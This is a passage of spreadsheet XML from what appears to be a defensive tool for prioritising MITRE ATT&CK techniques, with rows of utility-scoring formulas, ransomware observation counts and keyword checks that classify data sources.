      </c>
      <c r="W530" s="37">
        <v>0</v>
      </c>
      <c r="X530" s="37">
        <v>0</v>
      </c>
      <c r="Y530" s="37">
        <v>0</v>
      </c>
      <c r="Z530" s="37">
        <v>0</v>
      </c>
      <c r="AA530" s="37">
        <v>0</v>
      </c>
      <c r="AB530" s="37">
        <v>0</v>
      </c>
      <c r="AC530" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD530" s="50"/>
      <c r="AE530" s="37" t="str" cm="1">
        <f t="array" ref="AE530">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD530)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF530" s="37">
        <v>526</v>
      </c>
      <c r="AG530" s="37" t="str" cm="1">
        <f t="array" ref="AG530">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD530)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH530" s="37">
        <v>526</v>
      </c>
      <c r="AI530" s="37" t="str" cm="1">
        <f t="array" ref="AI530">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD530)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ530" s="37">
        <v>526</v>
      </c>
      <c r="AK530" s="37" t="str" cm="1">
        <f t="array" ref="AK530">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD530)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL530" s="37">
        <v>526</v>
      </c>
      <c r="AM530" s="37" t="str" cm="1">
        <f t="array" ref="AM530">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD530)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN530" s="37">
        <v>0</v>
      </c>
      <c r="AO530" s="37">
        <v>0</v>
      </c>
      <c r="AP530" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ530" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.083333333333336</v>
      </c>
      <c r="AR530" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS530" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT530" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU53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31" spans="1:47" ht="17">
      <c r="A531" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B531" s="37">
        <f t="shared" si="8"/>
        <v>105.45</v>
      </c>
      <c r="C531" s="37" t="s">
        <v>1819</v>
      </c>
      <c r="D531" s="50" t="s">
        <v>1812</v>
      </c>
      <c r="E531" s="37" t="s">
        <v>1807</v>
      </c>
      <c r="F531" s="37">
        <v>0</v>
      </c>
      <c r="G531" s="37">
        <v>1</v>
      </c>
      <c r="H531" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I531" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J531" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K531" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L531" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M531" s="37">
        <v>0</v>
      </c>
      <c r="N531" s="56">
        <v>0</v>
      </c>
      <c r="O531" s="56">
        <v>0</v>
      </c>
      <c r="P531" s="56">
        <v>0</v>
      </c>
      <c r="Q531" s="56">
        <v>0</v>
      </c>
      <c r="R531" s="57"/>
      <c r="S531" s="57">
        <v>0</v>
      </c>
      <c r="T531" s="57"/>
      <c r="U531" s="57">
        <v>0</v>
      </c>
      <c r="V531" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W531" s="37">
        <v>0</v>
      </c>
      <c r="X531" s="37">
        <v>0</v>
      </c>
      <c r="Y531" s="37">
        <v>0</v>
      </c>
      <c r="Z531" s="37">
        <v>0</v>
      </c>
      <c r="AA531" s="37">
        <v>0</v>
      </c>
      <c r="AB531" s="37">
        <v>0</v>
      </c>
      <c r="AC531" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD531" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE531" s="37" t="str" cm="1">
        <f t="array" ref="AE531">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD531)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF531" s="37">
        <v>527</v>
      </c>
      <c r="AG531" s="37" t="str" cm="1">
        <f t="array" ref="AG531">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD531)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH531" s="37">
        <v>527</v>
      </c>
      <c r="AI531" s="37" t="str" cm="1">
        <f t="array" ref="AI531">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD531)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ531" s="37">
        <v>527</v>
      </c>
      <c r="AK531" s="37" t="str" cm="1">
        <f t="array" ref="AK531">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD531)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL531" s="37">
        <v>527</v>
      </c>
      <c r="AM531" s="37" t="str" cm="1">
        <f t="array" ref="AM531">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD531)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN531" s="37">
        <v>0</v>
      </c>
      <c r="AO531" s="37">
        <v>0</v>
      </c>
      <c r="AP531" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ531" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.15</v>
      </c>
      <c r="AR531" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS531" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT531" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU53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32" spans="1:47" ht="17">
      <c r="A532" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B532" s="37">
        <f t="shared" si="8"/>
        <v>105.65</v>
      </c>
      <c r="C532" s="37" t="s">
        <v>1820</v>
      </c>
      <c r="D532" s="50" t="s">
        <v>1812</v>
      </c>
      <c r="E532" s="37" t="s">
        <v>1810</v>
      </c>
      <c r="F532" s="37">
        <v>0</v>
      </c>
      <c r="G532" s="37">
        <v>1</v>
      </c>
      <c r="H532" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I532" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J532" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K532" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L532" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M532" s="37">
        <v>0</v>
      </c>
      <c r="N532" s="56">
        <v>0</v>
      </c>
      <c r="O532" s="56">
        <v>0</v>
      </c>
      <c r="P532" s="56">
        <v>0</v>
      </c>
      <c r="Q532" s="56">
        <v>0</v>
      </c>
      <c r="R532" s="57"/>
      <c r="S532" s="57"/>
      <c r="T532" s="57"/>
      <c r="U532" s="57"/>
      <c r="V532" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W532" s="37">
        <v>0</v>
      </c>
      <c r="X532" s="37">
        <v>0</v>
      </c>
      <c r="Y532" s="37">
        <v>0</v>
      </c>
      <c r="Z532" s="37">
        <v>0</v>
      </c>
      <c r="AA532" s="37">
        <v>0</v>
      </c>
      <c r="AB532" s="37">
        <v>0</v>
      </c>
      <c r="AC532" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD532" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE532" s="37" t="str" cm="1">
        <f t="array" ref="AE532">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD532)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF532" s="37">
        <v>528</v>
      </c>
      <c r="AG532" s="37" t="str" cm="1">
        <f t="array" ref="AG532">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD532)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH532" s="37">
        <v>528</v>
      </c>
      <c r="AI532" s="37" t="str" cm="1">
        <f t="array" ref="AI532">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD532)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ532" s="37">
        <v>528</v>
      </c>
      <c r="AK532" s="37" t="str" cm="1">
        <f t="array" ref="AK532">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD532)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL532" s="37">
        <v>528</v>
      </c>
      <c r="AM532" s="37" t="str" cm="1">
        <f t="array" ref="AM532">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD532)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN532" s="37">
        <v>0</v>
      </c>
      <c r="AO532" s="37"/>
      <c r="AP532" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ532" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.216666666666669</v>
      </c>
      <c r="AR532" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS532" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT532" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU53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33" spans="1:47" ht="34">
      <c r="A533" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B533" s="37">
        <f t="shared" si="8"/>
        <v>105.85000000000001</v>
      </c>
      <c r="C533" s="37" t="s">
        <v>1821</v>
      </c>
      <c r="D533" s="50" t="s">
        <v>1822</v>
      </c>
      <c r="E533" s="37"/>
      <c r="F533" s="37">
        <v>0</v>
      </c>
      <c r="G533" s="37">
        <v>1</v>
      </c>
      <c r="H533" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I533" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J533" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K533" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L533" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M533" s="37">
        <v>0</v>
      </c>
      <c r="N533" s="56">
        <v>0</v>
      </c>
      <c r="O533" s="56">
        <v>0</v>
      </c>
      <c r="P533" s="56">
        <v>0</v>
      </c>
      <c r="Q533" s="56">
        <v>0</v>
      </c>
      <c r="R533" s="57"/>
      <c r="S533" s="57">
        <v>0</v>
      </c>
      <c r="T533" s="57"/>
      <c r="U533" s="57">
        <v>0</v>
      </c>
      <c r="V533" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W533" s="37">
        <v>0</v>
      </c>
      <c r="X533" s="37">
        <v>0</v>
      </c>
      <c r="Y533" s="37">
        <v>0</v>
      </c>
      <c r="Z533" s="37">
        <v>0</v>
      </c>
      <c r="AA533" s="37">
        <v>0</v>
      </c>
      <c r="AB533" s="37">
        <v>0</v>
      </c>
      <c r="AC533" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD533" s="50" t="s">
        <v>1823</v>
      </c>
      <c r="AE533" s="37" t="str" cm="1">
        <f t="array" ref="AE533">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD533)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF533" s="37">
        <v>529</v>
      </c>
      <c r="AG533" s="37" t="str" cm="1">
        <f t="array" ref="AG533">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD533)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH533" s="37">
        <v>529</v>
      </c>
      <c r="AI533" s="37" t="str" cm="1">
        <f t="array" ref="AI533">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD533)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ533" s="37">
        <v>529</v>
      </c>
      <c r="AK533" s="37" t="str" cm="1">
        <f t="array" ref="AK533">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD533)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL533" s="37">
        <v>529</v>
      </c>
      <c r="AM533" s="37" t="str" cm="1">
        <f t="array" ref="AM533">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD533)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN533" s="37">
        <v>0</v>
      </c>
      <c r="AO533" s="37">
        <v>1</v>
      </c>
      <c r="AP533" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ533" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.283333333333339</v>
      </c>
      <c r="AR533" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS533" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT533" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU53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0.86388888888888893</v>
      </c>
    </row>
    <row r="534" spans="1:47" ht="34">
      <c r="A534" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B534" s="37">
        <f t="shared" si="8"/>
        <v>106.05000000000001</v>
      </c>
      <c r="C534" s="37" t="s">
        <v>1824</v>
      </c>
      <c r="D534" s="50" t="s">
        <v>1822</v>
      </c>
      <c r="E534" s="37" t="s">
        <v>1825</v>
      </c>
      <c r="F534" s="37">
        <v>0</v>
      </c>
      <c r="G534" s="37">
        <v>1</v>
      </c>
      <c r="H534" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I534" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J534" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K534" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L534" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M534" s="37">
        <v>0</v>
      </c>
      <c r="N534" s="56">
        <v>0</v>
      </c>
      <c r="O534" s="56">
        <v>0</v>
      </c>
      <c r="P534" s="56">
        <v>0</v>
      </c>
      <c r="Q534" s="56">
        <v>0</v>
      </c>
      <c r="R534" s="57"/>
      <c r="S534" s="57">
        <v>0</v>
      </c>
      <c r="T534" s="57"/>
      <c r="U534" s="57">
        <v>0</v>
      </c>
      <c r="V534" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W534" s="37">
        <v>0</v>
      </c>
      <c r="X534" s="37">
        <v>0</v>
      </c>
      <c r="Y534" s="37">
        <v>0</v>
      </c>
      <c r="Z534" s="37">
        <v>0</v>
      </c>
      <c r="AA534" s="37">
        <v>0</v>
      </c>
      <c r="AB534" s="37">
        <v>0</v>
      </c>
      <c r="AC534" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD534" s="50" t="s">
        <v>1823</v>
      </c>
      <c r="AE534" s="37" t="str" cm="1">
        <f t="array" ref="AE534">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD534)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF534" s="37">
        <v>530</v>
      </c>
      <c r="AG534" s="37" t="str" cm="1">
        <f t="array" ref="AG534">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD534)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH534" s="37">
        <v>530</v>
      </c>
      <c r="AI534" s="37" t="str" cm="1">
        <f t="array" ref="AI534">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD534)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ534" s="37">
        <v>530</v>
      </c>
      <c r="AK534" s="37" t="str" cm="1">
        <f t="array" ref="AK534">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD534)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL534" s="37">
        <v>530</v>
      </c>
      <c r="AM534" s="37" t="str" cm="1">
        <f t="array" ref="AM534">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD534)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN534" s="37">
        <v>0</v>
      </c>
      <c r="AO534" s="37">
        <v>0</v>
      </c>
      <c r="AP534" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ534" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.35</v>
      </c>
      <c r="AR534" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS534" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT534" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU53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35" spans="1:47" ht="17">
      <c r="A535" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B535" s="37">
        <f t="shared" si="8"/>
        <v>106.25</v>
      </c>
      <c r="C535" s="37" t="s">
        <v>1826</v>
      </c>
      <c r="D535" s="50" t="s">
        <v>1822</v>
      </c>
      <c r="E535" s="37" t="s">
        <v>1827</v>
      </c>
      <c r="F535" s="37">
        <v>0</v>
      </c>
      <c r="G535" s="37">
        <v>1</v>
      </c>
      <c r="H535" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I535" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J535" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K535" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L535" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M535" s="37">
        <v>0</v>
      </c>
      <c r="N535" s="56">
        <v>0</v>
      </c>
      <c r="O535" s="56">
        <v>0</v>
      </c>
      <c r="P535" s="56">
        <v>0</v>
      </c>
      <c r="Q535" s="56">
        <v>0</v>
      </c>
      <c r="R535" s="57"/>
      <c r="S535" s="57">
        <v>0</v>
      </c>
      <c r="T535" s="57"/>
      <c r="U535" s="57">
        <v>0</v>
      </c>
      <c r="V535" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W535" s="37">
        <v>0</v>
      </c>
      <c r="X535" s="37">
        <v>0</v>
      </c>
      <c r="Y535" s="37">
        <v>0</v>
      </c>
      <c r="Z535" s="37">
        <v>0</v>
      </c>
      <c r="AA535" s="37">
        <v>0</v>
      </c>
      <c r="AB535" s="37">
        <v>0</v>
      </c>
      <c r="AC535" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD535" s="50"/>
      <c r="AE535" s="37" t="str" cm="1">
        <f t="array" ref="AE535">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD535)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF535" s="37">
        <v>531</v>
      </c>
      <c r="AG535" s="37" t="str" cm="1">
        <f t="array" ref="AG535">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD535)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH535" s="37">
        <v>531</v>
      </c>
      <c r="AI535" s="37" t="str" cm="1">
        <f t="array" ref="AI535">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD535)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ535" s="37">
        <v>531</v>
      </c>
      <c r="AK535" s="37" t="str" cm="1">
        <f t="array" ref="AK535">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD535)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL535" s="37">
        <v>531</v>
      </c>
      <c r="AM535" s="37" t="str" cm="1">
